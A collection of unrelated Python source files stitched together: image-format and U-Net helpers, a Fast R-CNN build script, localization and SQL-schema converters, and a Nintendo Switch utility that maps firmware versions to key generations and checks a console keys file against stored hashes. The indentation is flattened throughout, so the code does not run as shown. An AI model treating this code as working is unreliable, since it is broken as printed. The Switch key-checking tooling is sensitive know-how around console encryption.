def _get_next_line(f):
next_line = f.readline().decode('utf-8').rstrip()
# ignore comments
while next_line.startswith('#'):
next_line = f.readline().rstrip()
return next_line
with open(fpath, 'rb') as f:
# header
identifier = _get_next_line(f)
if identifier != expected_identifier:
raise Exception('Unknown identifier. Expected: "%s", got: "%s".' % (expected_identifier, identifier))
try:
line_dimensions = _get_next_line(f)
dimensions = line_dimensions.split(' ')
width = int(dimensions[0].strip())
height = int(dimensions[1].strip())
except:
raise Exception('Could not parse dimensions: "%s". '
'Expected "width height", e.g. "512 512".' % line_dimensions)
try:
line_scale = _get_next_line(f)
scale = float(line_scale)
assert scale != 0
if scale < 0:
endianness = "<"
else:
endianness = ">"
except:
raise Exception('Could not parse max value / endianess information: "%s". '
'Should be a non-zero number.' % line_scale)
try:
data = np.fromfile(f, "%sf" % endianness)
data = np.reshape(data, (height, width))
data = np.flipud(data)
with np.errstate(invalid="ignore"):
data *= abs(scale)
except:
raise Exception('Invalid binary values. Could not create %dx%d array from input.' % (height, width))
return data
def write_pfm(data, fpath, scale=1, file_identifier=b'Pf', dtype="float32"):
# PFM format definition: http://netpbm.sourceforge.net/doc/pfm.html
data = np.flipud(data)
height, width = np.shape(data)[:2]
values = np.ndarray.flatten(np.asarray(data, dtype=dtype))
endianess = data.dtype.byteorder
if endianess == '<' or (endianess == '=' and sys.byteorder == 'little'):
scale *= -1
with open(fpath, 'wb') as file:
file.write((file_identifier))
file.write(('\n%d %d\n' % (width, height)).encode())
file.write(('%d\n' % scale).encode())
file.write(values)
|
the-stack_106_15935
|
from __future__ import print_function, division
import cv2
import numpy as np
from numba import jit
@jit
def copy_with_resize(src, dest, size):
'''
Copy an image with resizing
Parameters:
src - source
dest - destination
size - (width, height) tuple
'''
img = cv2.imread(src)
if img.shape[:2][::-1] != size:
img = cv2.resize(img, size)
cv2.imwrite(dest, img)
@jit
def mask_from_image_to_unet_label_fast(mask, n_classes):
labels = np.zeros(mask.shape + (n_classes,), dtype=np.uint8)
for r in range(mask.shape[0]):
for c in range(mask.shape[1]):
plane = mask[r,c]
# REVIEW: masks that come out of Weka may have junk in them!!
if plane >= n_classes:
if n_classes == 2:
labels[r, c, 1] = 1
else:
labels[r, c, 0] = 1
else:
labels[r, c, plane] = 1
return labels
def mask_from_image_to_unet_label(mask_src, mask_dest, size, n_classes):
'''
Convert mask from image to a numpy array usable for Unet
Parameters:
mask_src - source mask file (image)
mask_dest - destination file - saved numpy array
size - (width, height) tuple
n_classes - number of classes
'''
mask = cv2.imread(mask_src, cv2.IMREAD_GRAYSCALE)
if mask.shape[:2][::-1] != size:
mask = cv2.resize(mask, size)
labels = mask_from_image_to_unet_label_fast(mask, n_classes)
np.savez_compressed(mask_dest, labels=labels)
def unet_proba_to_class_masks(labels):
'''
Convert each entry in the label array of predictions from probability
to actual class-number mask
Parameters:
labels -- N x H x W x C (C - number of classes) numpy array
Returns:
N x H x W numpy array of masks
'''
if len(labels.shape) < 4:
return labels
return np.argmax(labels, axis=3)
|
the-stack_106_15940
|
# --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
import numpy as np
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# Obtain the numpy include directory. This logic works across numpy versions.
try:
numpy_include = np.get_include()
except AttributeError:
numpy_include = np.get_numpy_include()
def customize_compiler_for_nvcc(self):
"""inject deep into distutils to customize how the dispatch
to gcc/nvcc works.
If you subclass UnixCCompiler, it's not trivial to get your subclass
injected in, and still have the right customizations (i.e.
distutils.sysconfig.customize_compiler) run on it. So instead of going
the OO route, I have this. Note, it's kindof like a wierd functional
subclassing going on."""
# tell the compiler it can processes .cu
self.src_extensions.append('.cu')
# save references to the default compiler_so and _comple methods
default_compiler_so = self.compiler_so
super = self._compile
# now redefine the _compile method. This gets executed for each
# object but distutils doesn't have the ability to change compilers
# based on source extension: we add it.
def _compile(obj, src, ext, cc_args, extra_postargs, pp_opts):
print(extra_postargs)
if os.path.splitext(src)[1] == '.cu':
# use the cuda for .cu files
self.set_executable('compiler_so', CUDA['nvcc'])
# use only a subset of the extra_postargs, which are 1-1 translated
# from the extra_compile_args in the Extension class
postargs = extra_postargs['nvcc']
else:
postargs = extra_postargs['gcc']
super(obj, src, ext, cc_args, postargs, pp_opts)
# reset the default compiler_so, which we might have changed for cuda
self.compiler_so = default_compiler_so
# inject our redefined _compile method into the class
self._compile = _compile
# run the customize_compiler
class custom_build_ext(build_ext):
def build_extensions(self):
customize_compiler_for_nvcc(self.compiler)
build_ext.build_extensions(self)
thisdir = os.path.dirname(os.path.abspath(__file__))
source_dir = os.path.join(thisdir, 'utils')
ext_modules = [
Extension(
"utils.cython_bbox",
[os.path.join(source_dir, "bbox.pyx")],
extra_compile_args={'gcc': ["-Wno-cpp", "-Wno-unused-function"]},
include_dirs=[numpy_include]
),
]
if __name__ == '__main__':
setup(
name='utils',
ext_modules=ext_modules,
# inject our custom trigger
cmdclass={'build_ext': custom_build_ext},
)
|
the-stack_106_15941
|
import sys
import pathlib
field_type_mapping = {'CHAR': 'TEXT',
'INTEGER': 'INTEGER',
'TIMESTAMP': 'TEXT',
'VARCHAR': 'TEXT',
'DATE': 'TEXT'}
filename = pathlib.Path(sys.argv[1])
table_name = filename.stem.rsplit('_', 1)[0]
print('CREATE table {} ('.format(table_name))
field_defs = []
has_rpt_id = False
with open(filename) as f:
next(f)
next(f)
for line in f:
name = line[:55].strip().lower()
nullable = line[55:64].strip()
field_type = field_type_mapping[line[64:].strip()]
definition = '{} {} {}'.format(name, field_type, nullable)
if name == 'oid':
definition += ' PRIMARY KEY'
elif table_name == 'lm_data' and name == 'rpt_id':
definition += ' PRIMARY KEY'
if name == 'rpt_id':
has_rpt_id = True
field_defs.append(definition)
if table_name != 'lm_data' and has_rpt_id:
field_defs += ['FOREIGN KEY(rpt_id) REFERENCES lm_data(rpt_id)']
print(', '.join(field_defs))
print(');')
|
the-stack_106_15942
|
import csv
import os
import re
def translate(file, path):
csv_file = open(file, 'r')
csv_reader = csv.reader(csv_file, delimiter=',')
locales = [
{'identifier' : 'fr', 'column' : 3},
{'identifier' : 'en', 'column' : 5}
]
for aLocale in locales:
if not os.path.exists(path+aLocale['identifier']+'.lproj'):
os.makedirs(path+aLocale['identifier']+'.lproj')
file = open(path+aLocale['identifier']+'.lproj/Localizable.strings','w')
for row in csv_reader:
#Sample Code - You should override it
key = row[1]
value = row[aLocale['column']]
file.write("\""+key+"\"=\""+escape(value)+"\";\n")
file.close()
def escape(str):
return str.replace("\"","\\\"").replace("\\\\n","\\n")
def is_valid_android_key(str):
"""
In android xml file, the key must follow some requirements :
- the key should not contain uppercased letter
- The key should not beggin with a number
- The only special accepted character is _
You can edit the regexp as you required
"""
prog = re.compile("([a-z]+)(([a-z]*)(_)*([0-9])*)*")
result = prog.match(str)
return result
def escape_android(str):
"""
This function escape common symbol from iOS to Android ( %@ -> %s )
You can add your own rules
"""
tmp = str.replace("\"", "\\\"")\
.replace("\\\\n", "\\n")\
.replace("'", "\\'")\
.replace("%@", "%s")\
.replace("&", "&")
if "<" in str or ">" in str:
return "<![CDATA["+tmp+"]]>"
else:
return tmp
def translate_android(file, path):
"""
This function parse the file located at {file} and export it in files located into {path}
"""
#Provide here mapping between your CSV columns and the desired output file
#The key is never write into the output file, use it for clarity
#The file value is the name of the folder which will be generated by the program
#The column value should be an integer which represent the column of the desired local in the CSV file
#
locales = {
'en': {'file': 'values/', 'column': 2},
'fr': {'file': 'values-fr/', 'column': 3},
'ja': {'file': 'values-ja/', 'column': 5},
'zh': {'file': 'values-zh/', 'column': 4}
}
#iterate over all locales to generate the translation file
for aLocal in locales.keys():
csv_file = open(file, 'r')
csv_reader = csv.reader(csv_file, delimiter=',')
_path = path+'/'+locales[aLocal]['file']
if not os.path.exists(path):
os.makedirs(path)
if not os.path.exists(_path):
os.makedirs(_path)
file_pointer = open(_path+'strings.xml', 'w')
#Add default text to xml file
file_pointer.write('<?xml version="1.0" encoding="utf-8"?>\n')
file_pointer.write('<resources>\n')
i = 0
for row in csv_reader:
#You have to implement your own parser rules here.
key = row[1]
value = row[locales[aLocal]['column']]
value = escape_android(value)
#Check if the key is valid for android usage. See is_valid_android_key documentation for more infos
if not is_valid_android_key(key):
print("Invalid android key provided :"+key)
else:
file_pointer.write(" <string name=\"" + key + "\">" + value +
"</string>\n")
file_pointer.write('</resources>\n')
file_pointer.close()
|
the-stack_106_15943
|
import random
import os, codecs
import Hex
from binascii import hexlify as hx, unhexlify as uhx
import Keys
import re
from hashlib import sha256
from struct import pack as pk, unpack as upk
import Fs
import aes128
import sq_tools
import io
import Print
indent = 1
tabs = '\t' * indent
'''
versions =
0: "1.0.0", -> keygeneration = 0
450: "1.0.0", -> keygeneration = 0
65536: "2.0.0", -> keygeneration = 1
131072: "2.1.0", -> keygeneration = 1
196608: "2.2.0", -> keygeneration = 1
262144: "2.3.0", -> keygeneration = 1
201326592: "3.0.0", -> keygeneration = 2
201392128: "3.0.1", -> keygeneration = 3
201457664: "3.0.2", -> keygeneration = 3
268435456: "4.0.0", -> keygeneration = 4
268500992: "4.0.1", -> keygeneration = 4
269484032: "4.1.0", -> keygeneration = 4
335544320: "5.0.0", -> keygeneration = 5
335609856: "5.0.1", -> keygeneration = 5
335675392: "5.0.2", -> keygeneration = 5
336592896: "5.1.0", -> keygeneration = 5
402653184: "6.0.0", -> keygeneration = 6
402718720: "6.0.1", -> keygeneration = 6
403701760: "6.1.0", -> keygeneration = 6
404750336: "6.2.0" -> keygeneration = 7
469762048: "7.0.0" -> keygeneration = 8
469827584: "7.0.1" -> keygeneration = 8
536870912: "8.0.0" -> keygeneration = 8
536936448: "8.0.1" -> keygeneration = 8
537919488: "8.1.0" -> keygeneration = 9
603979776: "9.0.0" -> keygeneration = 10
604045312: "9.0.1" -> keygeneration = 10
605028352: "9.1.0" -> keygeneration = 11
606076928: "9.2.0" -> keygeneration = 11
671088640: "10.0.0" -> keygeneration = 11
671154176: "10.0.1" -> keygeneration = 11
671219712: "10.0.2" -> keygeneration = 11
671285248: "10.0.3" -> keygeneration = 11
671350784: "10.0.4" -> keygeneration = 11
672137216: "10.1.0" -> keygeneration = 11
672202752: "10.1.1" -> keygeneration = 11
673185792: "10.2.0" -> keygeneration = 11
'''
def kgstring():
kg=list()
kg11=[605028352,606076928,671088640,671154176,671219712,671285248,671350784,672137216,672202752,673185792];kg.append(kg11)
kg10=[603979776,604045312];kg.append(kg10)
kg9=[537919488];kg.append(kg9)
kg8=[536936448,536870912,469827584,469762048];kg.append(kg8)
kg7=[404750336];kg.append(kg7)
kg6=[403701760,402718720,402653184];kg.append(kg6)
kg5=[336592896,335675392,335609856,335544320];kg.append(kg5)
kg4=[269484032,268500992,268435456];kg.append(kg4)
kg3=[201457664,201392128];kg.append(kg3)
kg2=[201326592];kg.append(kg2)
kg1=[262144,196608,131072,65536];kg.append(kg1)
kg0=[450,0];kg.append(kg0)
return kg
def kg_by_RSV(RSV):
kgs=kgstring();keygen=len(kgs);topkg=len(kgs)
for k in range(len(kgs)):
if RSV in kgs[k]:
keygen-=1
if keygen<0:
return 'unknown'
return keygen
def transform_fw_string(FW):
FW=FW.split('-');rem=0;RRSV=0
if len(FW)>1:
rem=FW[1]
else:
rem=0
FW=FW[0]
FW=FW.split('.')
RSV=0
for i in range(len(FW)):
n=int(FW[i])
if i==0:
if n>=3:
RSV+=67108864*n
elif n==2:
RSV+=65536
elif i==1 and int(FW[0])>3:
RSV+=1048576*n
elif i==1 and int(FW[0])==2:
RSV+=1*n
elif i==2 and int(FW[0])>3:
RSV+=65536*n
RRSV=RSV+rem
return RSV,RRSV
def kg2masterkey(kg):
if kg == 1:
return 1
else:
return kg-1
def getTopRSV(keygeneration, RSV):
if keygeneration == 0:
return 450
if keygeneration == 1:
return 262164
if keygeneration == 2:
return 201327002
if keygeneration == 3:
return 201457684
if keygeneration == 4:
return 269484082
if keygeneration == 5:
return 336592976
if keygeneration == 6:
return 403701850
if keygeneration == 7:
return 404750376
if keygeneration == 8:
return 536936448
if keygeneration == 9:
return 537919488
if keygeneration == 10:
return 603979776
if keygeneration == 11:
return 673185792
else:
return RSV
def getMinRSV(keygeneration, RSV):
if keygeneration == 0:
return 0
if keygeneration == 1:
return 65796
if keygeneration == 2:
RSV=3*67108864
return RSV
if keygeneration == 3:
RSV=3*67108864+1*65536
return RSV
if keygeneration == 4:
RSV=4*67108864
return RSV
if keygeneration == 5:
RSV=5*67108864
return RSV
if keygeneration == 6:
RSV=6*67108864
return RSV
if keygeneration == 7:
RSV=6*67108864+2*1048576
return RSV
if keygeneration == 8:
RSV=7*67108864
return RSV
if keygeneration == 9:
RSV=8*67108864+1*1048576
return RSV
if keygeneration == 10:
RSV=9*67108864
return RSV
if keygeneration == 11:
RSV=9*67108864+2*1048576+0*65796+0*1
return RSV
else:
return RSV
def getFWRangeKG(keygeneration):
if keygeneration == 0:
return "(1.0.0)"
if keygeneration == 1:
return "(2.0.0 - 2.3.0)"
if keygeneration == 2:
return "(3.0.0)"
if keygeneration == 3:
return "(3.0.1 - 3.0.2)"
if keygeneration == 4:
return "(4.0.0 - 4.1.0)"
if keygeneration == 5:
return "(5.0.0 - 5.1.0)"
if keygeneration == 6:
return "(6.0.0 - 6.1.0)"
if keygeneration == 7:
return "(6.2.0)"
if keygeneration == 8:
return "(7.0.0 - 8.0.1)"
if keygeneration == 9:
return "(8.1.0)"
if keygeneration == 10:
return "(9.0.0 - 9.0.1)"
if keygeneration == 11:
return "(9.1.0 - >10.2.0)"
else:
return "UNKNOWN"
def getmetacontenttype(ncatypenumber):
ncatypenumber=int(ncatypenumber)
if ncatypenumber==0:
return "Meta"
elif ncatypenumber==1:
return "Program"
elif ncatypenumber==2:
return "Data"
elif ncatypenumber==3:
return "Control"
elif ncatypenumber==4:
return "HtmlDocument"
elif ncatypenumber==5:
return "LegalInformation"
elif ncatypenumber==6:
return "DeltaFragment"
def getFWRangeRSV(RSV):
if RSV >= (3*67108864):
RSV=int(RSV)
frst_num=str(int(RSV/67108864))
remainder=RSV%67108864
sec_num=str(int(remainder/1048576))
remainder=remainder%1048576
thd_num=str(int(remainder/65536))
remainder=remainder%65536
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV >= 65536:
RSV=int(RSV)
frst_num=2
sec_num=str(int(RSV/65536))
remainder=RSV%65536
thd_num=0
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV > 0:
RSV=int(RSV)
frst_num=1
sec_num=0
thd_num=0
remainder=RSV%65536
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV == 0:
return "(1.0.0)"
else:
return "(-)"
def getSize(bytes):
if bytes>(1024*1024*1024):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
Gbytes=str(Gbytes)+"GB"
return Gbytes
if bytes>(1024*1024):
Mbytes=bytes/(1024*1024)
Mbytes=round(Mbytes,2)
Mbytes=str(Mbytes)+"MB"
return Mbytes
if bytes>(1024):
Kbytes=bytes/(1024)
Kbytes=round(Kbytes,2)
Kbytes=str(Kbytes)+"KB"
return Kbytes
else:
bytes=str(bytes)+"B"
return bytes
def getGCsize(bytes):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
if Gbytes>=32:
card=0xE3
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=16:
card=0xE2
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=8:
card=0xE1
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=4:
card=0xE0
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=2:
card=0xF0
firm_ver='1100a100'
return card,firm_ver
if Gbytes>=1:
card=0xF8
firm_ver='1100a100'
return card,firm_ver
if Gbytes<1:
card=0xFA
firm_ver='1100a100'
return card,firm_ver
def getGCsizeinbytes(GCflag):
bytes=''
if GCflag=='E3':
size=64
if GCflag=='E2':
size=32
if GCflag=='E1':
size=16
if GCflag=='E0':
size=8
if GCflag=='F0':
size=4
if GCflag=='F8':
size=2
if GCflag=='FA':
size=1
bytes=size*998244352
return bytes
def getTypeFromCNMT(number):
if number == 0:
return "Meta: "
if number == 1:
return "Program: "
if number == 2:
return "Data: "
if number == 3:
return "Control: "
if number == 4:
return "HtmlDoc: "
if number == 5:
return "LegalInf: "
if number == 6:
return "Delta: "
def randhex(size):
hexdigits = "0123456789ABCDEF"
random_digits = "".join([ hexdigits[random.randint(0,0xF)] for _ in range(size*2) ])
return random_digits
def get_enc_gameinfo(bytes):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
if Gbytes>=32 or Gbytes>=16 or Gbytes>=8 or Gbytes>=4:
firm_ver= 0x9298F35088F09F7D
access_freq= 0xa89a60d4
Read_Wait_Time= 0xcba6f96f
Read_Wait_Time2= 0xa45bb6ac
Write_Wait_Time= 0xabc751f9
Write_Wait_Time2= 0x5d398742
Firmware_Mode = 0x6b38c3f2
CUP_Version = 0x10da0b70
Empty1 = 0x0e5ece29
Upd_Hash= 0xa13cbe1da6d052cb
CUP_Id = 0xf2087ce9af590538
Empty2= 0x570d78b9cdd27fbeb4a0ac2adff9ba77754dd6675ac76223506b3bdabcb2e212fa465111ab7d51afc8b5b2b21c4b3f40654598620282add6
else:
firm_ver= 0x9109FF82971EE993
access_freq=0x5011ca06
Read_Wait_Time=0x3f3c4d87
Read_Wait_Time2=0xa13d28a9
Write_Wait_Time=0x928d74f1
Write_Wait_Time2=0x49919eb7
Firmware_Mode =0x82e1f0cf
CUP_Version = 0xe4a5a3bd
Empty1 = 0xf978295c
Upd_Hash= 0xd52639a4991bdb1f
CUP_Id = 0xed841779a3f85d23
Empty2= 0xaa4242135616f5187c03cf0d97e5d218fdb245381fd1cf8dfb796fbeda4bf7f7d6b128ce89bc9eaa8552d42f597c5db866c67bb0dd8eea11
firm_ver=firm_ver.to_bytes(8, byteorder='big')
access_freq=access_freq.to_bytes(4, byteorder='big')
Read_Wait_Time=Read_Wait_Time.to_bytes(4, byteorder='big')
Read_Wait_Time2=Read_Wait_Time2.to_bytes(4, byteorder='big')
Write_Wait_Time=Write_Wait_Time.to_bytes(4, byteorder='big')
Write_Wait_Time2=Write_Wait_Time2.to_bytes(4, byteorder='big')
Firmware_Mode=Firmware_Mode.to_bytes(4, byteorder='big')
CUP_Version=CUP_Version.to_bytes(4, byteorder='big')
Empty1=Empty1.to_bytes(4, byteorder='big')
Upd_Hash=Upd_Hash.to_bytes(8, byteorder='big')
CUP_Id=CUP_Id.to_bytes(8, byteorder='big')
Empty2=Empty2.to_bytes(56, byteorder='big')
Game_info = b''
Game_info += firm_ver
Game_info += access_freq
Game_info += Read_Wait_Time
Game_info += Read_Wait_Time2
Game_info += Write_Wait_Time
Game_info += Write_Wait_Time2
Game_info += Firmware_Mode
Game_info += CUP_Version
Game_info += Empty1
Game_info += Upd_Hash
Game_info += CUP_Id
Game_info += Empty2
#print(Game_info)
return Game_info
def get_krypto_block(keygeneration):
if keygeneration == 0:
return 'f3cbc0052cac528adf9129210f0a02e4'
if keygeneration == 1:
return 'f3cbc0052cac528adf9129210f0a02e4'
if keygeneration == 2:
return '789800b9e78b860eec2f7862ef05545e'
if keygeneration == 3:
return '99776e03a21f56232d056b8683d9c681'
if keygeneration == 4:
return '48df2c73957fa1b73b8e33fb2d052512'
if keygeneration == 5:
return '91dea3589a56e4fa1ce60a444009e7d8'
if keygeneration == 6:
return 'cd5b0d1abcf6450f37b8a3b68a15d5e9'
if keygeneration == 7:
return 'e7ae8f7303809fd63cbd1f500b31d5b9'
else:
return "UNKNOWN"
def verify_nkeys(fileName):
indent = 1
tabs = ' ' * indent
checkkeys = {}
with open(fileName, encoding="utf8") as f:
for line in f.readlines():
r = re.match('\s*([a-z0-9_]+)\s*=\s*([A-F0-9]+)\s*', line, re.I)
if r:
checkkeys[r.group(1)] = r.group(2)
print("")
if 'aes_kek_generation_source' not in checkkeys:
print("aes_kek_generation_source is Missing")
if 'aes_key_generation_source' not in checkkeys:
print("aes_key_generation_source is Missing")
if 'titlekek_source' not in checkkeys:
print("titlekek_source is Missing")
if 'key_area_key_application_source' not in checkkeys:
print("key_area_key_application_source is Missing")
if 'key_area_key_ocean_source' not in checkkeys:
print("key_area_key_ocean_source is Missing")
if 'key_area_key_system_source' not in checkkeys:
print("key_area_key_system_source is Missing")
counter=0
if 'master_key_00' not in checkkeys:
print("master_key_00 is Missing")
else:
counter+=1
if 'master_key_01' not in checkkeys:
print("master_key_01 is Missing")
else:
counter+=1
if 'master_key_02' not in checkkeys:
print("master_key_02 is Missing")
else:
counter+=1
if 'master_key_03' not in checkkeys:
print("master_key_03 is Missing")
else:
counter+=1
if 'master_key_04' not in checkkeys:
print("master_key_04 is Missing")
else:
counter+=1
if 'master_key_05' not in checkkeys:
print("master_key_05 is Missing")
else:
counter+=1
if 'master_key_06' not in checkkeys:
print("master_key_06 is Missing")
else:
counter+=1
if 'master_key_07' not in checkkeys:
print("master_key_07 is Missing")
else:
counter+=1
if 'master_key_08' not in checkkeys:
print("master_key_08 is Missing")
else:
counter+=1
if 'master_key_09' not in checkkeys:
print("master_key_09 is Missing")
else:
counter+=1
if 'master_key_10' not in checkkeys and 'master_key_0a' not in checkkeys:
print("master_key_10|master_key_0a is Missing")
else:
counter+=1
if 'header_key' not in checkkeys:
print("header_key is Missing")
if 'xci_header_key' not in checkkeys:
print('OPTIONAL KEY "xci_header_key" is Missing')
while counter<len(checkkeys):
if len(str(counter))<2:
mkverifier='master_key_0'+str(counter)
else:
mkverifier='master_key'+str(counter)
if mkverifier in checkkeys:
print(mkverifier+" is present but program doesn't have the hash to verify the key")
for i in checkkeys:
if i==mkverifier:
mk =checkkeys[i][:]
sha=sha256(uhx(mk)).hexdigest()
print(' > HEX SHA256: '+sha)
print('')
counter+=1
for i in checkkeys:
if i == 'aes_kek_generation_source':
aes_kek_generation_source =checkkeys[i][:]
print('aes_kek_generation_source : '+aes_kek_generation_source )
sha=sha256(uhx(aes_kek_generation_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fc02b9d37b42d7a1452e71444f1f700311d1132e301a83b16062e72a78175085':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'aes_key_generation_source':
aes_key_generation_source =checkkeys[i][:]
print('aes_key_generation_source : '+aes_key_generation_source )
sha=sha256(uhx(aes_key_generation_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fbd10056999edc7acdb96098e47e2c3606230270d23281e671f0f389fc5bc585':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'titlekek_source':
titlekek_source=checkkeys[i][:]
print('titlekek_source: '+titlekek_source)
sha=sha256(uhx(titlekek_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'c48b619827986c7f4e3081d59db2b460c84312650e9a8e6b458e53e8cbca4e87':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_application_source':
key_area_key_application_source=checkkeys[i][:]
print('key_area_key_application_source: '+key_area_key_application_source)
sha=sha256(uhx(key_area_key_application_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '04ad66143c726b2a139fb6b21128b46f56c553b2b3887110304298d8d0092d9e':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_ocean_source':
key_area_key_ocean_source=checkkeys[i][:]
print('key_area_key_ocean_source: '+key_area_key_ocean_source)
sha=sha256(uhx(key_area_key_ocean_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fd434000c8ff2b26f8e9a9d2d2c12f6be5773cbb9dc86300e1bd99f8ea33a417':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_system_source':
key_area_key_system_source=checkkeys[i][:]
print('key_area_key_system_source: '+key_area_key_system_source)
sha=sha256(uhx(key_area_key_system_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '1f17b1fd51ad1c2379b58f152ca4912ec2106441e51722f38700d5937a1162f7':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_00':
master_key_00=checkkeys[i][:]
print('master_key_00: '+master_key_00)
sha=sha256(uhx(master_key_00)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '0ee359be3c864bb0782e1d70a718a0342c551eed28c369754f9c4f691becf7ca':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_01':
master_key_01=checkkeys[i][:]
print('master_key_01: '+master_key_01)
sha=sha256(uhx(master_key_01)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4fe707b7e4abdaf727c894aaf13b1351bfe2ac90d875f73b2e20fa94b9cc661e':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_02':
master_key_02=checkkeys[i][:]
print('master_key_02: '+master_key_02)
sha=sha256(uhx(master_key_02)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '79277c0237a2252ec3dfac1f7c359c2b3d121e9db15bb9ab4c2b4408d2f3ae09':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_03':
master_key_03=checkkeys[i][:]
print('master_key_03: '+master_key_03)
sha=sha256(uhx(master_key_03)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4f36c565d13325f65ee134073c6a578ffcb0008e02d69400836844eab7432754':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_04':
master_key_04=checkkeys[i][:]
print('master_key_04: '+master_key_04)
sha=sha256(uhx(master_key_04)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '75ff1d95d26113550ee6fcc20acb58e97edeb3a2ff52543ed5aec63bdcc3da50':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_05':
master_key_05=checkkeys[i][:]
print('master_key_05: '+master_key_05)
sha=sha256(uhx(master_key_05)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'ebe2bcd6704673ec0f88a187bb2ad9f1cc82b718c389425941bdc194dc46b0dd':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_06':
master_key_06=checkkeys[i][:]
print('master_key_06: '+master_key_06)
sha=sha256(uhx(master_key_06)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '9497e6779f5d840f2bba1de4e95ba1d6f21efc94717d5ae5ca37d7ec5bd37a19':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_07':
master_key_07=checkkeys[i][:]
print('master_key_07: '+master_key_07)
sha=sha256(uhx(master_key_07)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4ec96b8cb01b8dce382149443430b2b6ebcb2983348afa04a25e53609dabedf6':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_08':
master_key_08=checkkeys[i][:]
print('master_key_08: '+master_key_08)
sha=sha256(uhx(master_key_08)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '2998e2e23609bc2675ff062a2d64af5b1b78dff463b24119d64a1b64f01b2d51':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_09':
master_key_09=checkkeys[i][:]
print('master_key_09: '+master_key_09)
sha=sha256(uhx(master_key_09)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '9d486a98067c44b37cf173d3bf577891eb6081ff6b4a166347d9dbbf7025076b':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_10' or i == 'master_key_0a':
master_key_10=checkkeys[i][:]
print('master_key_10|master_key_0a: '+master_key_10)
sha=sha256(uhx(master_key_10)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4ec5a237a75a083a9c5f6cf615601522a7f822d06bd4ba32612c9cebbb29bd45':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'header_key':
header_key=checkkeys[i][:]
print('header_key: '+header_key)
